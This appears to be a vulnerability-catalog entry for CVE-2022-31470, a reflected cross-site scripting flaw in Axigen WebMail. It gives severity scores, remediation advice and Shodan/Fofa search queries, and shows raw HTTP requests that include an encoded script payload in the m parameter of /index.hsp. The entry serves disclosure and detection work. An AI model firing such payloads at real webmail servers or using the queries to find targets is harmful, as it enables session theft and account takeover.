| Title | Axigen WebMail - Cross-Site Scripting |
|---|---|
| Author | AmirZargham |
| Severity | Medium |
| Impact | Attackers can craft malicious URLs with JavaScript in the m parameter that executes when users access the link, potentially stealing session cookies, credentials, or performing unauthorized actions in the victim's Axigen WebMail account. |
| Remediation | Update Axigen WebMail to a version later than 10.5.0-4370c946 that properly sanitizes and encodes the m parameter. |
| CVSS Score | 6.1 |
| EPSS Score | 0.25054 |
| CVE ID | CVE-2022-31470 |
| CWE ID | CWE-79 |
| Shodan Query | title:"Axigen" |
| Fofa Query | title="Axigen" |
| Tags | cve cve2022 axigen webmail xss vuln |
Axigen WebMail versions 10.5.0-4370c946 and older are vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /index.hsp?m=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31470.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-31470.pcap
N/AN/A